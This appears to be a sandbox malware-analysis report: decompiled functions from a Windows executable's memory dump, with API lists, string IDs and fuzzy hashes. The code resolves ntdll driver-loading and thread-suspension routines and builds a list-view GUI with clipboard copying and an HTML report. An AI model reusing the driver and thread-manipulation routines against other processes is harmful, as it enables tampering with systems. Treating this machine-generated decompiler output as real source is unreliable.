                                                                                                                                                      					 *0x4132a0 = GetProcAddress( *0x4132c4, "NtOpenSymbolicLinkObject");
                                                                                                                                                      					 *0x4132a4 = GetProcAddress( *0x4132c4, "NtQuerySymbolicLinkObject");
                                                                                                                                                      					 *0x4132a8 = GetProcAddress( *0x4132c4, "NtQueryObject");
                                                                                                                                                      					 *0x4132ac = GetProcAddress( *0x4132c4, "NtOpenThread");
                                                                                                                                                      					 *0x4132b0 = GetProcAddress( *0x4132c4, "NtClose");
                                                                                                                                                      					 *0x4132b4 = GetProcAddress( *0x4132c4, "NtQueryInformationThread");
                                                                                                                                                      					 *0x4132b8 = GetProcAddress( *0x4132c4, "NtSuspendThread");
                                                                                                                                                      					 *0x4132bc = GetProcAddress( *0x4132c4, "NtResumeThread");
                                                                                                                                                      					_t14 = GetProcAddress( *0x4132c4, "NtTerminateThread");
                                                                                                                                                      					 *0x4132c0 = _t14;
                                                                                                                                                      					return _t14;
                                                                                                                                                      				}
                                                                                                                                                      				return _t1;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,0040C596,?,?,00000000), ref: 0040C430
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040C447
                                                                                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040C459
                                                                                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040C46B
                                                                                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040C47D
                                                                                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040C48F
                                                                                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 0040C4A1
                                                                                                                                                      • GetProcAddress.KERNEL32(NtOpenThread), ref: 0040C4B3
                                                                                                                                                      • GetProcAddress.KERNEL32(NtClose), ref: 0040C4C5
                                                                                                                                                      • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 0040C4D7
                                                                                                                                                      • GetProcAddress.KERNEL32(NtSuspendThread), ref: 0040C4E9
                                                                                                                                                      • GetProcAddress.KERNEL32(NtResumeThread), ref: 0040C4FB
                                                                                                                                                      • GetProcAddress.KERNEL32(NtTerminateThread), ref: 0040C50D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                      • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                                                      • API String ID: 667068680-4280973841
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040AE4D(signed int __eax, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				int _t11;
                                                                                                                                                      				void* _t13;
                                                                                                                                                      				void* _t15;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      
                                                                                                                                                      				_t15 = __edx;
                                                                                                                                                      				_t13 = __ecx;
                                                                                                                                                      				_t16 = __esi + 0x6ac;
                                                                                                                                                      				E0040637A(__eax | 0xffffffff, __esi + 0x6ac, 0x40f454);
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x6bc)) = 0x4000;
                                                                                                                                                      				E0040AE99(_t13, _t15, __esi,  *((intOrPtr*)(__esi + 0x69c)));
                                                                                                                                                      				_t17 = E0040636E(_t16);
                                                                                                                                                      				_t11 = OpenClipboard( *(__esi + 0x208));
                                                                                                                                                      				if(_t11 != 0) {
                                                                                                                                                      					return E004054F1(_t17);
                                                                                                                                                      				}
                                                                                                                                                      				return _t11;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
                                                                                                                                                        • Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC
                                                                                                                                                        • Part of subcall function 0040AE99: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0040AEEB
                                                                                                                                                      • OpenClipboard.USER32(?), ref: 0040AE86
                                                                                                                                                        • Part of subcall function 004054F1: EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
                                                                                                                                                        • Part of subcall function 004054F1: wcslen.MSVCRT ref: 00405506
                                                                                                                                                        • Part of subcall function 004054F1: GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
                                                                                                                                                        • Part of subcall function 004054F1: GlobalLock.KERNEL32 ref: 00405523
                                                                                                                                                        • Part of subcall function 004054F1: memcpy.MSVCRT ref: 0040552C
                                                                                                                                                        • Part of subcall function 004054F1: GlobalUnlock.KERNEL32(00000000), ref: 00405535
                                                                                                                                                        • Part of subcall function 004054F1: SetClipboardData.USER32 ref: 0040553E
                                                                                                                                                        • Part of subcall function 004054F1: CloseClipboard.USER32 ref: 0040554E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Clipboard$Global$memcpywcslen$AllocCloseDataEmptyLockMessageOpenSendUnlock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2178300729-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                      			E0040D12C(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, signed int _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, short _a72, intOrPtr _a76, struct tagRECT _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a584) {
                                                                                                                                                      				signed int _v0;
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				signed int _v36;
                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                      				struct HWND__* _v56;
                                                                                                                                                      				struct HWND__* _v60;
                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                      				struct HDC__* _t169;
                                                                                                                                                      				struct HWND__* _t171;
                                                                                                                                                      				intOrPtr _t220;
                                                                                                                                                      				void* _t221;
                                                                                                                                                      				intOrPtr _t232;
                                                                                                                                                      				struct HWND__* _t234;
                                                                                                                                                      				void* _t237;
                                                                                                                                                      				intOrPtr* _t271;
                                                                                                                                                      				signed int _t272;
                                                                                                                                                      				signed int _t273;
                                                                                                                                                      
                                                                                                                                                      				_t271 = __esi;
                                                                                                                                                      				_t273 = _t272 & 0xfffffff8;
                                                                                                                                                      				E0040E340(0x4298, __ecx);
                                                                                                                                                      				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e4));
                                                                                                                                                      				_t234 = GetDlgItem( *(__esi + 0x10), 0x3e9);
                                                                                                                                                      				_a4 = GetDlgItem( *(__esi + 0x10), 0x3e8);
                                                                                                                                                      				_a20 = GetWindowLongW(_t234, 0xfffffff0);
                                                                                                                                                      				_a24 = GetWindowLongW(_a4, 0xfffffff0);
                                                                                                                                                      				_a96 = GetWindowLongW(_t234, 0xffffffec);
                                                                                                                                                      				_a36 = GetWindowLongW(_a4, 0xffffffec);
                                                                                                                                                      				GetWindowRect(_t234,  &_a100);
                                                                                                                                                      				GetWindowRect(_a4,  &_a60);
                                                                                                                                                      				MapWindowPoints(0,  *(__esi + 0x10),  &_a100, 2);
                                                                                                                                                      				MapWindowPoints(0,  *(__esi + 0x10),  &_a60, 2);
                                                                                                                                                      				_t237 = _a108 - _a100.x;
                                                                                                                                                      				_a4 = _a4 & 0x00000000;
                                                                                                                                                      				_a28 = _a68 - _a60.x;
                                                                                                                                                      				_a76 = _a112 - _a104;
                                                                                                                                                      				_a40 = _a72 - _a64;
                                                                                                                                                      				_t169 = GetDC( *(__esi + 0x10));
                                                                                                                                                      				_a16 = _t169;
                                                                                                                                                      				if(_t169 == 0) {
                                                                                                                                                      					L9:
                                                                                                                                                      					_v0 = _v0 & 0x00000000;
                                                                                                                                                      					if( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)) <= 0) {
                                                                                                                                                      						L12:
                                                                                                                                                      						_t171 = GetDlgItem( *(_t271 + 0x10), 1);
                                                                                                                                                      						_a36 = _t171;
                                                                                                                                                      						GetWindowRect(_t171,  &_a44);
                                                                                                                                                      						MapWindowPoints(0,  *(_t271 + 0x10),  &_a44, 2);
                                                                                                                                                      						GetClientRect( *(_t271 + 0x10),  &_a124);
                                                                                                                                                      						GetWindowRect( *(_t271 + 0x10),  &_a80);
                                                                                                                                                      						SetWindowPos( *(_t271 + 0x10), 0, 0, 0, _a88 - _a80.left + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
                                                                                                                                                      						GetClientRect( *(_t271 + 0x10),  &_a80);
                                                                                                                                                      						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
                                                                                                                                                      					}
                                                                                                                                                      					_a20 = _a20 | 0x10000000;
                                                                                                                                                      					_a24 = _a24 | 0x10000000;
                                                                                                                                                      					_a8 = _a12 + 0x10;
                                                                                                                                                      					do {
                                                                                                                                                      						 *((intOrPtr*)( *_t271 + 0x20))(_v0);
                                                                                                                                                      						_v24 = E00401551(_t271, _a92, L"STATIC", _a16, _a96, _v0 + _a100.x, _t237, _a72);
                                                                                                                                                      						_v52 = E00401551(_t271, _v0, L"EDIT", _v12, _a24, _v32 + _a28, _v8,  *(_t271 + 0x48) * _a4);
                                                                                                                                                      						L0040DFD6();
                                                                                                                                                      						_t273 = _t273 + 0x10;
                                                                                                                                                      						SetWindowTextW(_v56,  &_a72);
                                                                                                                                                      						SetWindowTextW(_v60,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x40))))))(_v68,  &_a584,  &_a72, 0xff, L"%s:", _v60->i));
                                                                                                                                                      						_v68 = _v68 + 0x14;
                                                                                                                                                      						_v72 = _v72 +  *(_t271 + 0x48) * _v36 +  *((intOrPtr*)(_t271 + 0x4c));
                                                                                                                                                      						_v76 = _v76 + 1;
                                                                                                                                                      					} while (_v76 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
                                                                                                                                                      					goto L12;
                                                                                                                                                      				}
                                                                                                                                                      				_t220 = 0;
                                                                                                                                                      				_a32 = _a32 & 0;
                                                                                                                                                      				_a8 = 0;
                                                                                                                                                      				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e0)) <= 0) {
                                                                                                                                                      					L8:
                                                                                                                                                      					_t221 = _t220 - _t237;
                                                                                                                                                      					_a28 = _a28 - _t221;
                                                                                                                                                      					_a60.x = _a60.x + _t221;
                                                                                                                                                      					_t237 = _t237 + _t221;
                                                                                                                                                      					ReleaseDC( *(_t271 + 0x10), _a16);
                                                                                                                                                      					goto L9;
                                                                                                                                                      				}
                                                                                                                                                      				_v0 = _a12 + 0x10;
                                                                                                                                                      				do {
                                                                                                                                                      					if(GetTextExtentPoint32W(_a16,  *_v0, wcslen( *_v0),  &_a116) != 0) {
                                                                                                                                                      						_t232 = _a100.x + 0xa;
                                                                                                                                                      						if(_t232 > _v8) {
                                                                                                                                                      							_v8 = _t232;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_a16 =  &(_a16->i);
                                                                                                                                                      					_v16 = _v16 + 0x14;
                                                                                                                                                      				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
                                                                                                                                                      				_t220 = _v8;
                                                                                                                                                      				goto L8;
                                                                                                                                                      			}



























                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040D159
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040D165
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0040D174
                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040D180
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0040D189
                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0040D195
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040D1A7
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040D1B2
                                                                                                                                                      • MapWindowPoints.USER32 ref: 0040D1C6
                                                                                                                                                      • MapWindowPoints.USER32 ref: 0040D1D4
                                                                                                                                                      • GetDC.USER32 ref: 0040D20D
                                                                                                                                                      • wcslen.MSVCRT ref: 0040D24D
                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040D25E
                                                                                                                                                      • ReleaseDC.USER32 ref: 0040D2AB
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040D36E
                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D382
                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 0040D3A0
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040D3D6
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040D3E6
                                                                                                                                                      • MapWindowPoints.USER32 ref: 0040D3F4
                                                                                                                                                      • GetClientRect.USER32 ref: 0040D40B
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040D415
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040D45B
                                                                                                                                                      • GetClientRect.USER32 ref: 0040D465
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040D49D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                                                                      • Opcode ID: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
                                                                                                                                                      • Instruction ID: af222cd68e1cf1c2961fcc0c9276d13d323a9bd1d9fa968012e99cc026c1ed94
                                                                                                                                                      • Opcode Fuzzy Hash: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
                                                                                                                                                      • Instruction Fuzzy Hash: D4B1C171508301AFD720DFA8C985E6BBBF9FF88714F00492DF695962A1D775E8088F16
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                      			E0040A742(void* __ecx, void* __eflags, void* __fp0) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				struct HMENU__* _t123;
                                                                                                                                                      				struct HWND__* _t125;
                                                                                                                                                      				void* _t131;
                                                                                                                                                      				intOrPtr _t135;
                                                                                                                                                      				intOrPtr _t139;
                                                                                                                                                      				void* _t187;
                                                                                                                                                      				long _t193;
                                                                                                                                                      				void* _t198;
                                                                                                                                                      				void* _t200;
                                                                                                                                                      				void* _t216;
                                                                                                                                                      				long _t218;
                                                                                                                                                      				intOrPtr _t220;
                                                                                                                                                      				intOrPtr _t221;
                                                                                                                                                      				void* _t222;
                                                                                                                                                      				int _t225;
                                                                                                                                                      				void* _t226;
                                                                                                                                                      				intOrPtr* _t228;
                                                                                                                                                      				intOrPtr* _t229;
                                                                                                                                                      				void* _t231;
                                                                                                                                                      				void* _t232;
                                                                                                                                                      				intOrPtr* _t233;
                                                                                                                                                      				long _t241;
                                                                                                                                                      
                                                                                                                                                      				_t229 = _t231 - 0x78;
                                                                                                                                                      				_t232 = _t231 - 0xa4;
                                                                                                                                                      				 *((char*)(_t229 - 0x23)) = 1;
                                                                                                                                                      				_t187 = __ecx;
                                                                                                                                                      				 *(_t229 - 0x2c) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t229 - 0x28)) = 0;
                                                                                                                                                      				 *((char*)(_t229 - 0x24)) = 0;
                                                                                                                                                      				 *((char*)(_t229 - 0x22)) = 0;
                                                                                                                                                      				 *((char*)(_t229 - 0x21)) = 0;
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				 *(_t229 - 0x18) = 1;
                                                                                                                                                      				 *((intOrPtr*)(_t229 - 0x14)) = 0x9c41;
                                                                                                                                                      				 *((char*)(_t229 - 0x10)) = 4;
                                                                                                                                                      				 *((char*)(_t229 - 0xf)) = 0;
                                                                                                                                                      				 *((char*)(_t229 - 0xe)) = 0;
                                                                                                                                                      				 *((char*)(_t229 - 0xd)) = 0;
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				 *((intOrPtr*)(_t229 - 4)) = 5;
                                                                                                                                                      				 *_t229 = 0x9c44;
                                                                                                                                                      				 *((char*)(_t229 + 4)) = 4;
                                                                                                                                                      				 *((char*)(_t229 + 5)) = 0;
                                                                                                                                                      				 *((char*)(_t229 + 6)) = 0;
                                                                                                                                                      				 *((char*)(_t229 + 7)) = 0;
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				 *(_t229 + 0x10) = 2;
                                                                                                                                                      				 *((intOrPtr*)(_t229 + 0x14)) = 0x9c48;
                                                                                                                                                      				 *((char*)(_t229 + 0x18)) = 4;
                                                                                                                                                      				 *((char*)(_t229 + 0x19)) = 0;
                                                                                                                                                      				 *((char*)(_t229 + 0x1a)) = 0;
                                                                                                                                                      				 *((char*)(_t229 + 0x1b)) = 0;
                                                                                                                                                      				 *(_t229 + 0x68) =  *(_t229 + 0x68) | 0xffffffff;
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				 *((intOrPtr*)(_t229 + 0x24)) = 3;
                                                                                                                                                      				 *((intOrPtr*)(_t229 + 0x28)) = 0x9c49;
                                                                                                                                                      				 *((char*)(_t229 + 0x2c)) = 4;
                                                                                                                                                      				 *((char*)(_t229 + 0x2d)) = 0;
                                                                                                                                                      				 *((char*)(_t229 + 0x2e)) = 0;
                                                                                                                                                      				 *((char*)(_t229 + 0x2f)) = 0;
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				 *((intOrPtr*)(_t229 + 0x38)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t229 + 0x3c)) = 0x9c4e;
                                                                                                                                                      				 *((char*)(_t229 + 0x40)) = 4;
                                                                                                                                                      				 *((char*)(_t229 + 0x41)) = 0;
                                                                                                                                                      				 *((char*)(_t229 + 0x42)) = 0;
                                                                                                                                                      				 *((char*)(_t229 + 0x43)) = 0;
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				 *((intOrPtr*)(_t229 + 0x4c)) = 4;
                                                                                                                                                      				 *((intOrPtr*)(_t229 + 0x50)) = 0x9c42;
                                                                                                                                                      				 *((char*)(_t229 + 0x54)) = 4;
                                                                                                                                                      				 *((char*)(_t229 + 0x55)) = 0;
                                                                                                                                                      				 *((char*)(_t229 + 0x56)) = 0;
                                                                                                                                                      				 *((char*)(_t229 + 0x57)) = 0;
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				_t216 = 0x66;
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				_t123 = E00406AFA(_t216);
                                                                                                                                                      				 *(__ecx + 0x21c) = _t123;
                                                                                                                                                      				SetMenu( *(__ecx + 0x208), _t123);
                                                                                                                                                      				_t125 = CreateStatusWindowW(0x50000000, 0x40f454,  *(_t187 + 0x208), 0x101);
                                                                                                                                                      				 *(_t187 + 0x214) = _t125;
                                                                                                                                                      				SendMessageW(_t125, 0x404, 1, _t229 + 0x68);
                                                                                                                                                      				 *(_t187 + 0x218) = CreateToolbarEx( *(_t187 + 0x208), 0x50010900, 0x102, 6, 0, E00405F82(), _t229 - 0x2c, 7, 0x10, 0x10, 0x60, 0x10, 0x14);
                                                                                                                                                      				 *(_t229 + 0x74) = ImageList_Create(0x10, 0x10, 0x18, 0, 1);
                                                                                                                                                      				_t131 = E00402DE1(__fp0);
                                                                                                                                                      				 *(_t229 + 0x70) = _t131;
                                                                                                                                                      				ImageList_Add( *(_t229 + 0x74), _t131, 0);
                                                                                                                                                      				DeleteObject( *(_t229 + 0x70));
                                                                                                                                                      				SendMessageW( *(_t187 + 0x218), 0x436, 0,  *(_t229 + 0x74));
                                                                                                                                                      				_t135 =  *((intOrPtr*)(_t187 + 0x69c));
                                                                                                                                                      				_t236 =  *((intOrPtr*)(_t135 + 0x2f4));
                                                                                                                                                      				_t218 = 0x50810809;
                                                                                                                                                      				if( *((intOrPtr*)(_t135 + 0x2f4)) != 0) {
                                                                                                                                                      					_t218 = 0x50811809;
                                                                                                                                                      				}
                                                                                                                                                      				E00401EA3( *((intOrPtr*)(_t187 + 0x69c)), _t236, CreateWindowExW(0, L"SysListView32", 0, _t218, 0, 0, 0x190, 0xc8,  *(_t187 + 0x208), 0x103, GetModuleHandleW(0), 0), 1);
                                                                                                                                                      				_t139 =  *((intOrPtr*)(_t187 + 0x69c));
                                                                                                                                                      				_t193 =  *(_t139 + 0x2e0);
                                                                                                                                                      				_t220 =  *((intOrPtr*)(_t139 + 0x2e4));
                                                                                                                                                      				 *(_t229 + 0x70) =  *(_t139 + 0x2ac);
                                                                                                                                                      				if(_t193 <= 0) {
                                                                                                                                                      					L5:
                                                                                                                                                      					 *( *((intOrPtr*)(_t187 + 0x69c)) + 0x340) =  *(_t187 + 0x214);
                                                                                                                                                      					_t221 =  *((intOrPtr*)(_t187 + 0x69c));
                                                                                                                                                      					E004099C4(_t221);
                                                                                                                                                      					ImageList_ReplaceIcon( *(_t221 + 0x2b4), 0, LoadIconW(GetModuleHandleW(0), 0x66));
                                                                                                                                                      					_t222 = 0x68;
                                                                                                                                                      					 *((intOrPtr*)(_t187 + 0x278)) = E00406AFA(_t222);
                                                                                                                                                      					 *(_t187 + 0x27c) = 0 | E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0x00000000;
                                                                                                                                                      					E0040B147(_t187, E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0, 0);
                                                                                                                                                      					memcpy(_t187 + 0x744,  &(( *(_t187 + 0x698))[0x8a]), 0x200c);
                                                                                                                                                      					_t233 = _t232 + 0xc;
                                                                                                                                                      					E00401500(_t187 + 0x6c4, 0x72,  *(_t187 + 0x208));
                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                      					ShowWindow( *(_t187 + 0x6d4),  ~(( *(_t187 + 0x698))[0x89]) & 0x00000005);
                                                                                                                                                      					 *( *(_t187 + 0x698)) = 1;
                                                                                                                                                      					E004077CB( *((intOrPtr*)(_t187 + 0x69c)));
                                                                                                                                                      					_t241 =  *0x4134e0; // 0x0
                                                                                                                                                      					if(_t241 == 0) {
                                                                                                                                                      						E00405812(0x4134e0);
                                                                                                                                                      						if((GetFileAttributesW(0x4134e0) & 0x00000001) != 0) {
                                                                                                                                                      							GetTempPathW(0x104, 0x4134e0);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t225 = wcslen(0x4134e0);
                                                                                                                                                      					 *_t233 = L"report.html";
                                                                                                                                                      					_t105 = wcslen(??) + 1; // 0x1
                                                                                                                                                      					_t243 = _t225 + _t105 - 0x104;
                                                                                                                                                      					if(_t225 + _t105 >= 0x104) {
                                                                                                                                                      						 *((short*)(_t187 + 0x288)) = 0;
                                                                                                                                                      					} else {
                                                                                                                                                      						E00405930(_t187 + 0x288, 0x4134e0, L"report.html");
                                                                                                                                                      					}
                                                                                                                                                      					_t198 = 0x30;
                                                                                                                                                      					E00409BA7( *((intOrPtr*)(_t187 + 0x69c)), _t198);
                                                                                                                                                      					_t226 = _t187;
                                                                                                                                                      					E0040A6FF(_t226);
                                                                                                                                                      					E00405D0F( *(_t187 + 0x214), 0x2000000);
                                                                                                                                                      					_t200 = 1;
                                                                                                                                                      					 *((intOrPtr*)(_t187 + 0x6a0)) = RegisterWindowMessageW(L"commdlg_FindReplace");
                                                                                                                                                      					E0040A1DC(0, _t200, _t226, _t243);
                                                                                                                                                      					 *(_t229 + 0x60) = 0x12c;
                                                                                                                                                      					 *((intOrPtr*)(_t229 + 0x64)) = 0x400;
                                                                                                                                                      					SendMessageW( *(_t226 + 0x214), 0x404, 2, _t229 + 0x60);
                                                                                                                                                      					SendMessageW( *(_t226 + 0x214), 0x40b, 0x1001, 0);
                                                                                                                                                      					return E00401BDC(_t226, 0x415);
                                                                                                                                                      				} else {
                                                                                                                                                      					_t228 = _t220 + 0xc;
                                                                                                                                                      					 *(_t229 + 0x74) = _t193;
                                                                                                                                                      					do {
                                                                                                                                                      						E00402842( *((intOrPtr*)(_t228 + 4)),  *((intOrPtr*)(_t228 - 8)),  *(_t229 + 0x70),  *((intOrPtr*)(_t228 - 0xc)),  *((intOrPtr*)(_t228 - 4)),  *_t228);
                                                                                                                                                      						_t232 = _t232 + 0x10;
                                                                                                                                                      						_t228 = _t228 + 0x14;
                                                                                                                                                      						_t81 = _t229 + 0x74;
                                                                                                                                                      						 *_t81 =  *(_t229 + 0x74) - 1;
                                                                                                                                                      					} while ( *_t81 != 0);
                                                                                                                                                      					goto L5;
                                                                                                                                                      				}
                                                                                                                                                      			}


                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406AFA: LoadMenuW.USER32 ref: 00406B02
                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 0040A84F
                                                                                                                                                      • CreateStatusWindowW.COMCTL32(50000000,0040F454,?,00000101), ref: 0040A86A
                                                                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040A888
                                                                                                                                                        • Part of subcall function 00405F82: GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
                                                                                                                                                        • Part of subcall function 00405F82: LoadImageW.USER32 ref: 00405F9F
                                                                                                                                                        • Part of subcall function 00405F82: GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
                                                                                                                                                        • Part of subcall function 00405F82: CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
                                                                                                                                                        • Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 00405FD1
                                                                                                                                                        • Part of subcall function 00405F82: GetSysColor.USER32(0000000F), ref: 00405FDC
                                                                                                                                                        • Part of subcall function 00405F82: GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
                                                                                                                                                        • Part of subcall function 00405F82: GetPixel.GDI32(00000000,?,?), ref: 0040600A
                                                                                                                                                        • Part of subcall function 00405F82: SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
                                                                                                                                                        • Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 0040603B
                                                                                                                                                        • Part of subcall function 00405F82: DeleteDC.GDI32(00000000), ref: 00406042
                                                                                                                                                      • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040A8B5
                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000018,00000000,00000001), ref: 0040A8CA
                                                                                                                                                        • Part of subcall function 00402DE1: GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
                                                                                                                                                        • Part of subcall function 00402DE1: LoadImageW.USER32 ref: 00402E01
                                                                                                                                                        • Part of subcall function 00402DE1: GetObjectW.GDI32(?,00000018,?), ref: 00402E25
                                                                                                                                                        • Part of subcall function 00402DE1: CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
                                                                                                                                                        • Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402E39
                                                                                                                                                        • Part of subcall function 00402DE1: GetSysColor.USER32(0000000F), ref: 00402E45
                                                                                                                                                        • Part of subcall function 00402DE1: GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
                                                                                                                                                        • Part of subcall function 00402DE1: GetPixel.GDI32(00000000,?,?), ref: 00402E83
